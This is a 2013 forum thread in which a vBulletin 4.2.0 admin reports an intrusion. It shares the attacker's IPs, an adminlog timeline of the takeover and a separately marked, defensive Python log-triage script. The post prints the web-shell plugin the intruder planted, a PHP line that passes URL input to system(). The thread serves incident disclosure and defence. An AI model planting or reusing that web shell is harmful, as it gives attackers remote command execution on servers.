#1
09-22-2013, 08:52 PM
team74
Join Date: Jul 2012
Posts: 4

v4.2.0 hacker details

This script kiddy can't handle his hormones and has gone on a rampage.

https://www.google.co.uk/#q=%22ma3kesi%22

Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in google in the past week.

IP addresses found in my adminlog table (you can search them yourself), from Indonesia/Burma:

203.81.72.83
101.255.62.233
email (I think not real, they didn't need a real email once inside): ma3kesi@mm.com

Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook).

What they did:
From the adminlog (descending, so the first actions are at the bottom):

Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`

Code:
(7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'),
(7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'),
(7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'),
(7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'),
(7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'),
(7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'),
(7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'),
(7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'),
(7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'),
(7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'),
(7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'),
(7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'),
(7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'),
(7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'),
(7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'),
(7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'),
(7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'),
(7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'),
(7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'),
(7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'),
(7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'),
(7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'),
(7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'),
(7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'),
(7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'),
(7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'),
(7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'),
(7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'),
(7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'),
(7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'),
(7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'),
(7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'),
(7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'),
(7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'),
(7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'),
(7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'),
(7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'),
(7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'),
(7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'),
(7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'),
(7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'),
(7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'),
(7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'),
(7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'),
(7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'),
(7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'),
(7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'),
(7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'),
(7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'),
(7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'),
(7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'),
(7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'),
(7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'),
(7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'),
(7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'),
(7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'),
(7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'),
(7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'),
(7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'),
(7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233');
They deleted userid 1919 so I can't check it. 1920 is still there, and is the new admin after deleting me. You can also see they exploited it with one IP, and then carried out the rest of the attack with the other.

They inserted this plugin (it was id=52 for me):

Code:
(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5);
And they deleted the default plugins that display the forum.

Initially they did change the main forum.php file too, I think this was through the admincp option because there is no sign of FTP access. I'm not a server guy, maybe they got in through SSH.

I also have about 550 lines of raw server log data showing what these 2 IPs did. I'm not sure if I should post it or not though. It seems to start with admincp/zxc.php
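Added example (not from the post or from vBulletin): a small Python triage script that parses rows in the adminlog dump format shown above, orders them oldest-first, and flags the plugin and user actions that make up this takeover, plus the admin userids acting from an IP that is not on your own allow-list. The sample rows are a constructed excerpt in the same layout as the dump, and the trusted admin IP `192.0.2.10` is an assumed placeholder.

```python
import re

# Constructed excerpt in the same tuple layout as the adminlog dump in the post:
# (adminlogid, userid, dateline, script, action, extrainfo, ipaddress)
ADMINLOG_DUMP = """
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233');
"""

# Leading "(" is optional because the first row of a pasted dump often loses it.
ROW_RE = re.compile(
    r"\(?\s*(\d+),\s*(\d+),\s*(\d+),\s*'([^']*)',\s*'([^']*)',\s*'([^']*)',\s*'([^']*)'\s*\)"
)

# (script, action) pairs a legitimate admin performs rarely and that form the
# backbone of the takeover described in the post
HIGH_RISK = {
    ('plugin.php', 'doimport'), ('plugin.php', 'add'), ('plugin.php', 'delete'),
    ('plugin.php', 'kill'), ('user.php', 'remove'), ('user.php', 'kill'),
    ('user.php', 'dodeleteusers'), ('user.php', 'dopruneusers'),
}

def parse_adminlog(dump):
    """Parse dump rows into dicts and return them oldest-first (the dump is newest-first)."""
    rows = []
    for m in ROW_RE.finditer(dump):
        logid, userid, dateline, script, action, extra, ip = m.groups()
        rows.append({'id': int(logid), 'userid': int(userid), 'dateline': int(dateline),
                     'script': script, 'action': action, 'extra': extra, 'ip': ip})
    return sorted(rows, key=lambda r: r['dateline'])

def triage(rows, known_admin_ips):
    """Return (high-risk rows, admin userids acting from an IP not in known_admin_ips)."""
    flagged = [r for r in rows if (r['script'], r['action']) in HIGH_RISK]
    foreign = sorted({r['userid'] for r in rows if r['ip'] not in known_admin_ips})
    return flagged, foreign

def removed_user_ids(rows):
    """Userids named in user.php remove/kill entries, i.e. accounts the intruder deleted."""
    ids = set()
    for r in rows:
        if r['script'] == 'user.php' and r['action'] in ('remove', 'kill'):
            m = re.search(r'user id = (\d+)', r['extra'])
            if m:
                ids.add(int(m.group(1)))
    return sorted(ids)

if __name__ == '__main__':
    rows = parse_adminlog(ADMINLOG_DUMP)
    flagged, foreign = triage(rows, {'192.0.2.10'})  # placeholder: your own admin IP(s)
    for r in flagged:
        print(r['dateline'], r['ip'], r['userid'], r['script'], r['action'], r['extra'])
    print('admin userids seen from unknown IPs:', foreign)
    print('accounts removed:', removed_user_ids(rows))
```

Run it over a full `SELECT ... FROM adminlog` export to get the intrusion timeline in one pass; the same tuple layout is what a MySQL dump of the table produces.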
#2
09-24-2013, 02:16 AM
pityocamptes
Join Date: Apr 2010
Posts: 595

Any way to just post the IPs by themselves?
#3
09-24-2013, 02:33 AM
Max Taxable
Join Date: Feb 2011
Posts: 3,134

Quote:
Originally Posted by team74
Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook).
IP blocking is a near useless tool anymore, since IPs and even user agent strings are so easy to spoof. Great and informative post though, otherwise.
#4
09-25-2013, 05:42 PM
alirex
Join Date: Nov 2007
Posts: 25

That's why I have mostly kept my admincp locked with .htaccess and allowed only my own IP. At least I have been safe for the last 8 months .. I only got hacked once last year, and I recovered from that.